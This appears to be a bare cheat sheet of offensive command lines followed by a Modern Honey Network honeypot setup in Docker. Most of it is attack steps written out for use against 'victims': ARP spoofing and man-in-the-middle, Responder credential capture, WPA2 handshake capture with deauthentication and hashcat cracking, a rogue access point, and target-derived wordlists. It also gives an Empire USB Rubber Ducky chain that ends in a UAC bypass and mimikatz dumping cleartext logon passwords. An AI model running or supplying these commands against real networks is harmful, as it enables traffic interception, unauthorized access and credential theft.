# echo 1 > proc/sys/net/ipv4/ip_forward
# ./arpspoof -t VICTIM_IP VICTIM_IP
# ./mitmf - -spoof - -arp - -gateway 192.168.1.1 - -target VICTIM_IP - -dns - -hsts -i wlan0
# bettercap --sniffer -G 192.168.1.1
# ./Responder.py -I wlan0
# airodump-ng -w /root/Desktop/wpa2handshake.cap -c 11 --bssid (bssid) wlan0mon
# aircrack-ng /root/Desktop/wpa2handshake.cap -J wpa2handshake_hashcat.hccap
You’re then prompted to choose network/SSID to parse.
# hashcat64.bin -a 3 -m 2500 -w 3 wpa2handshake_hashcat.hccap ?d?d?d?d?d?d?d?d?d?d -o WPAoutput.pot
iwconfig wlan0 txpower 27
airmon-ng start wlan0
airodump-ng wlan0mon
airbase-ng wlan0mon -c 11 -a 20:34:67:24:89:76 -e FakeAP -v -z 2
airbase-ng -a [victim AP MAC] -c 11-Z 4 --essid VictimAP wlan0mon
airodump-ng --bssid [victim AP MAC] wlan0mon --channel 11 -w /root/Desktop/rougueap
aireplay-ng -0 2 -a [router bssid] -c [Client MAC address] wlan0mon
aircrack-ng -b [victim AP MAC] -w /usr/share/wordlists/rockyou.txt rougue-01.cap
# wget -r -l 2 www.<targetwebsite>.com
# grep -hr "" www.<targetwebsite>.com/ | tr '[:space:]' '\n' | sort | uniq > wordlist.lst
# egrep -v '('\,'|'\;'|'\}'|'\{'|'\<'|'\>'|'\:'|'\='|'\"'|'\/'|'\/'|'\['|'\]')' wordlist.lst | sort -u > wordlist.clean.lst
# john --wordlist=wordlist.clean.lst --rules --stdout | uniq > final.wordlist.lst
Syntax: crunch <min> max<max> <characterset> -t <pattern> -o <output filename>
# crunch 8 8 -f /usr/share/rainbowcrack/charset.txt mixalpha -o /root/alphawordlist.lst
# crunch 10 10 -t @@@@@@0728 -o /root/birthdaywordlist.lst
# airodump-ng -c 11 --bssid [router bssid] -w /root/Desktop/wpa2handshake.cap mon0
# airodump-ng --ignore-negative-one --bssid [router bssid] -c 11 -w /root/Desktop/wpa2handshake.cap mon0 (Alternative method)
# aireplay-ng -0 2 -a [router bssid] -c 40:A6:D9:1F:4A:D3(Client MAC address) mon0
# aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
1. Create listener 1a. (Empire) > listeners 1b. (Empire: listeners) > set Name Listener01 1c. (Empire: listeners) > execute 1d. (Empire: listeners) > back
2. Create ducky payload 2a. (Empire) > agents 2b. (Empire: agents) > usestager ducky 2c. (Empire: stager/ducky) > set listener Listener01 2d. (Empire: stager/ducky) > set Outfile /home/ducky.txt 2e. (Empire: stager/ducky) > generate
3. Put payload onto Ducky 3a. Generate inject.bin file from code in ducky.txt at the Duck Toolkit site 3b. Copy inject.bin to Ducky 3c. Inject Ducky on victim
4. Try to extract login passwords from victim 4a. Wait for victim to connect back to Empire 4b. (Empire) > agents 4c. (Empire: agents) > list 4c. (Empire: agents) > interact FSDFSGAJ34FGH4 4d. (Empire: FSDFSGAJ34FGH4 ) > sysinfo 4e. (Empire: FSDFSGAJ34FGH4 ) > usemodule privesc/bypassuac 4f. (Empire: privesc/bypassuac ) > set Listener Listener01 4g. (Empire: privesc/bypassuac ) > run 4h. (Empire: privesc/bypassuac ) > back * 2 4i. (Empire: agents) > list 4j. (Empire: agents) > interact DSGHFDFSGHJ243J 4k. (Empire: DSGHFDFSGHJ243J ) > usemodule credentials/ mimikatz/logonpasswords 4l. (Empire: credentials/mimikatz/logonpasswords ) > run If succesful, logon passwords are now revealed in cleartext :)
~/.ssh/authorized_keyschmod 700 ~/.sshchmod 600 ~/.ssh/authorized_keyschmod go-w $HOME $HOME/.ssh $HOME/.ssh/authorized_keys # apt-get install docker.io
# docker run -p 10000:10000 -p 80:80 -p 8443:443 -p 3000:3000 -p 8091:8091 --name mhnsrv --hostname=mhnsrv01 -t -i ubuntu:14.04.2 /bin/bash
#!/bin/bash
set -x
apt-get update
apt-get upgrade -y
apt-get install git wget gcc supervisor -y
cd /opt/
git clone https://github.com/threatstream/mhn.git
cd mhn
cat > /etc/supervisor/conf.d/mhntodocker.conf <<EOF
[program:mongod]
command=/usr/bin/mongod
stdout_logfile=/var/log/supervisor/%(program_name)s.log
stderr_logfile=/var/log/supervisor/%(program_name)s.log
autorestart=true
autostart=true
[program:nginx]
command=/usr/sbin/nginx
stdout_events_enabled=true
stderr_events_enabled=true
autostart=true
autorestart=true
EOF
mkdir -p /data/db /var/log/mhn /var/log/supervisor
supervisord &
#Starts the mongod service after installation
echo supervisorctl start mongod >> /opt/mhn/scripts/install_mongo.sh
./install.sh
supervisorctl restart all Do you wish to run in Debug mode?: y/n n
Superuser email: fname.lname@mail.com
Superuser password:
Superuser password: (again):
Server base url [“http://1.2.3.4”]: 127.0.0.1
Honeymap url [“127.0.0.1:3000”]:
Mail server address [“localhost”]:
Mail server port [25]:
Use TLS for email?: y/n n
Use SSL for email?: y/n n
Mail server username [“”]:
Mail server password [“”]:
Mail default sender [“”]:
Path for log file [“/var/log/mhn/mhn.log”]:
# docker run --publish-all=true --name mhnsensor --hostname=mhnsensor01 -t -i ubuntu:14.04.2 /bin/bash
# docker run -p 21:21 -p 2222:22 -p 23:23 -p 25:25 -p 8080:80 -p 110:110 -p 135:135 -p 139:139 -p 445:445 -p 1433:1433 -p 3306:3306 -p 3389:3389 -p 5060:5060 -p 5061:5061 -p 5900:5900 -p 8081:8081 --name mhnsensor --hostname=mhnsensor01 -t -i ubuntu:14.04.2 /bin/bash
# apt install wget python
# cd /opt/mhn/scripts # ./install_hpfeeds-logger-splunk.sh # ./install_splunk_universalforwarder.sh 127.0.0.1 9997
# docker ps : show docker processes
# docker logs [container_id]: show docker logs
# docker inspect [container_id]: show docker details
# docker stats [container_id]: show docker stats
# docker port [container_id]: show docker port
# docker attach mhn : interact with mhn docker container
# CTRL-p CTRL-q : detach from container & leave it running
# docker start [container_id] : start a container
# docker exec [container_id] supervisord & : start the mhn server container + supervisor app.